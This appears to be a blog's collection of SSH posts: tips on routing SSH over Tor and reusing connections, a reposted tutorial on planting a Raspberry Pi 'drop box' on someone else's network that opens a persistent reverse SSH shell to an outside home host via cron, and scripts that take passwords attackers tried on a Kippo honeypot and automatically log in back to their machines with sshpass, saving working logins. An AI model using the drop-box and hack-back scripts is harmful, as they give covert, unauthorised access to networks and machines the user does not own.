Ssh

SSH through TOR automatically

Posted on by Seth Leedy
connect.c
connect.c
connect.c
89.0 KiB
357 Downloads
Details...

A user may wish to use SSH with Tor for any number of reasons. To do this, download and install connect.c (above) and then add this line to your SSH configuration:

Terminal
localhost:~ $ nano ~/.ssh/config

Compression yes # this compresses the SSH traffic to make it less slow over tor

ProxyCommand connect -5 -R remote -S localhost:9050 %h %p

After this has been added to the SSH configuration, a user can simply ssh myserver to be routed through Tor to the hidden service (or clearnet server). This can also be done with proxychains, but the ProxyCommand directive is a permament solution.

 

 857 total views

Reuse a ssh connection for less delay in its use.

Posted on by Seth Leedy

The good news is that if you can configure SSH to reuse an existing connection. This means that for example if you have an SSH shell session running then a new connection for SCP can skip the connection setup phase. Two steps are required:

First, you must create a directory (or ‘folder’) which SSH will use to keep track of established connections:

mkdir ~/.ssh/tmp
Next, add these two lines at the start of your ~/.ssh/config (make sure to use your username in place of ‘YOUR-NAME’):

ControlMaster auto
ControlPath   /home/YOUR-NAME/.ssh/tmp/%h_%p_%r
As you can see, a small investment in time setting up your SSH configuration can pay back dividends in convenience.

 836 total views

Reverse SSH Shell – Raspberry Pi Recipes

Posted on by Seth Leedy

From: http://www.irongeek.com/i.php?page=security%2Fraspberry-pi-recipes&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+IrongeeksSecuritySite+%28Irongeek%27s+Security+Site%29#SSH_Phone_Home:_Using_the_Raspberry_Pi_as_a_proxy/pivot_(Shovel_a_Shell)

SSH Phone Home: Using the Raspberry Pi as a proxy/pivot (Shovel a Shell)

        In  this section I’ll cover setting up a Raspberry Pi to send you a Reverse Shell using SSH (AKA: Shovel a shell). This is pretty good for blowing past NAT and some firewalls with weak egress filtering. The idea is that you can use these as drop boxes to leave behind on someone else’s network, then have them remote back out to you. These instructions should work pretty much the same on any *nix device or distro that uses OpenSSH. Make sure you have OpenSSH installed, but most distros I’ve seen do.

  • These are the non-automated commands to do a reverse SSH connection and set up a Proxy/Pivot using OpenSSH:
    On Raspberry Pi use the following command :

        ssh -R 1974:localhost:22 [email protected]

  • On PC (must have SSH server on box):

        ssh -D 1080 -p 1974 [email protected]

The above command also opens up a SOCKS port on you local PC host that you can use to tunnel traffic into the Raspberry Pis’s network with.

Automating it

    Ok, the commands above were just to do it manually, how about automating the shell shoveling? I based my work on Brandon Hutchinson’s script for automating the SSH reverse connection every 5 min, so check out his site.:
http://www.brandonhutchinson.com/Passwordless_ssh_logins.html
http://www.brandonhutchinson.com/ssh_tunnelling.html

Here are the steps:
1. SSH Keys Setup
Do the following on the Raspberry Pi, but replace “root” with the username on your home PC (I use home.irongeek.com in these examples)

        ssh-keygen -t rsa

Use a blank passphrase. This next line is to copy of the key to the PC

        cat ~/.ssh/id_rsa.pub | ssh [email protected] “cat – >> ~/.ssh/authorized_keys” 

2. Reverse SSH Automatic Script
Make a script called “autossh” on the Raspberry Pi with the contents of this script, replacing the parameters in green as needed:

#!/bin/sh

# Based on http://www.brandonhutchinson.com/ssh_tunnelling.html

# $REMOTE_HOST is the name of the remote system

REMOTE_HOST=home.irongeek.com

 

# Setting my username for home box, you will most likely want to change this

USER_NAME=root

 

# $REMOTE_PORT is the remote port number that will be used to tunnel

# back to this system

REMOTE_PORT=1974

 

# $COMMAND is the command used to create the reverse ssh tunnel

COMMAND=”ssh -q -N -R $REMOTE_PORT:localhost:22 [email protected]$REMOTE_HOST”

 

# Is the tunnel up? Perform two tests:

 

# 1. Check for relevant process ($COMMAND)

pgrep -f -x “$COMMAND” > /dev/null 2>&1 || $COMMAND

 

# 2. Test tunnel by looking at “netstat” output on $REMOTE_HOST

ssh $REMOTE_HOST netstat -an | egrep “tcp.*:$REMOTE_PORT.*LISTEN” \

> /dev/null 2>&1

if [ $? -ne 0 ] ; then

pkill -f -x “$COMMAND”

$COMMAND

fi

 and set it as executable with:

                    chmod 755 autossh

3. Use the “crontab –e” command on your Raspberry Pi to schedule the script to run every 5 min. The entry will be something like:

        */5 * * * * /home/pi/autossh
SSH Automatic Script

4. Now go to you home PC and you should be able to use this command to connect to the waiting shell:

        ssh –D 1080 -p 1974 [email protected]

Use port 1080 on the localhost for tools that will work with a SOCKS proxy and tunnel traffic into the remote network.

 

 1,291 total views

Scripts to find and verify SSH logins to other machines by hacking back via Kippo

Posted on by Seth Leedy

First we log all the connection attempts to my server(Live or new Virtual Machine) using the package called Kippo – http://code.google.com/p/kippo/.

Then we create this file I called grab_ssh_info.sh(Click for latest).

#!/bin/bash

 # Run this every day at least in order to get all the entries.
 # Run this before the logrotate does its work on the kippo log(You are rotating it right?) for the day/week/month$
 # Cron could be 44 min mark every hour so when it rotates at midnight you will not lose much data.

# Start a new log.
if [ -e /root/scripts/kippo_ssh_auths.log ]; then
 rm /root/scripts/kippo_ssh_auths.log
fi

# Since I am only looking at the recent listings, only look at todays based on the date timestamp
todays_date=date +%F
# Only read todays and loop each line in the string
grep -i $todays_date /home/ris/kippo-0.5/log/kippo.log | while read -r line; do

 # Only read the lines that contain login auths and IPs. All in one line in this case.
 if [[ echo $line | grep -i "login attempt" ]]; then
  # Cut out the different parts.
  inIP=echo $line | grep -i "login attempt" | cut -d '[' -f 2 | cut -d ',' -f 3 | cut -d ']' -f 1
  inUSER=echo $line | grep -i "login attempt" | cut -d '[' -f 3 | cut -d '/' -f 1
  inPASS=echo $line | grep -i "login attempt" | cut -d '[' -f 3 | cut -d '/' -f 2 | cut -d ']' -f 1

  # Throw it all in together for outputing to a log of my own.
  output="$inIP|$inUSER|$inPASS"
  #echo $output

  # IF we do not already have it in the log, append the info to it.
  if [ ! -e /root/scripts/kippo_ssh_auths.log ]; then
   touch /root/scripts/kippo_ssh_auths.log
  fi

  grep -q "$output" /root/scripts/kippo_ssh_auths.log
  if [ $? == 1 ]; then
   echo "$inIP|$inUSER|$inPASS" >> /root/scripts/kippo_ssh_auths.log
  fi
 fi
done

Then we can use the copy of /root/kippo_ssh_auths.log log to try and connect BACK to the door knockers machine and see if the login works.
If it does, add it to a success log(if new) and go on to the next one.
If it fails, ignore it. It will be deleted when we delete the copy of the log file at the end of the script.
I call this file test_ssh_info.sh

#!/bin/bash

# This script will take mv the /root/scripts/kippo_ssh_auths.log log to /root/scripts/test_ssh_auths.log
# so we can safely work on it.

# After moving, it will go line by line and take the arguments and test them by ssh.
# If it works, the info will be written to another log, /root/scripts/valid_ssh_auths.log for any other usage.

# Suggest running at 45 min mark every hour. Right after the grab info script.

mv /root/scripts/kippo_ssh_auths.log /root/scripts/test_ssh_auths.log

# Old string seperator
oifs=$IFS
# The one we want
IFS="|"

while read line; do

 echo "Testing: $line"
 # Split the line into a array
 # Format IP|USERNAME|PASSWORD
 tmp_arr=($line)
 testip=${tmp_arr[0]}
 testuser=${tmp_arr[1]}
 testpass=${tmp_arr[2]}
# echo "$testip $testuser $testpass"

 # Use the tool sshpass to passthrough a password to ssh
 # How can I do this in parallel ?
sshpass -p "$testpass" ssh -q -o "StrictHostKeyChecking no" -l "$testuser" $testip "exit"
# sshpass -p "$testpass" ssh -o "StrictHostKeyChecking no" -l "$testuser" $testip "exit"

 testssh=$?
# echo "Return Code: $testssh"

 # sshpass will exit with code 0 if it logged in ok.
 # ?? I was testing it and had some errors using the script. It would exit with 5. If I did it manualy, it worked $
 if [ $testssh == 0 ]; then
  output="$testip|$testuser|$testpass"

  if [ ! -e /root/scripts/valid_ssh_auths.log ]; then
   touch /root/scripts/valid_ssh_auths.log
  fi

  grep -q "$output" /root/scripts/valid_ssh_auths.log
  if [ $? == 1 ]; then
   echo "$line" >> /root/scripts/valid_ssh_auths.log
   echo "Valid: $line"
  else
   echo "NOT Valid: $line"
  fi
 fi

done < /root/scripts/test_ssh_auths.log;

# Change back the String Seperator
IFS=$oifs

# Remove the log that we tested
rm /root/scripts/test_ssh_auths.log

Small script(start_kippo.sh) for cron to make sure your Kippo is still running.
I noticed that the small VPS I was running would kill Kippo once awhile because I ran out of memory(32MB) and swap(32MB). So I tested every minute to see if needed starting again.

#!/bin/bash

ps aux | grep -i twistd | grep -q -i kippo
code=$?

if [ $code == 1 ]; then
 cd  /home/ris/kippo-0.5/
 sudo -u ris  /home/ris/kippo-0.5/start.sh
 echo "Started Kippo again."
fi

Set your log rotation to cycle the Kippo log every 24 hours or my scripts will be re testing a lot of ssh connections.
Set your cron to run them whenever. I recommend just before the logrotate cycle. Just make sure it is sequenced right. Do the grab script first.

 1,395 total views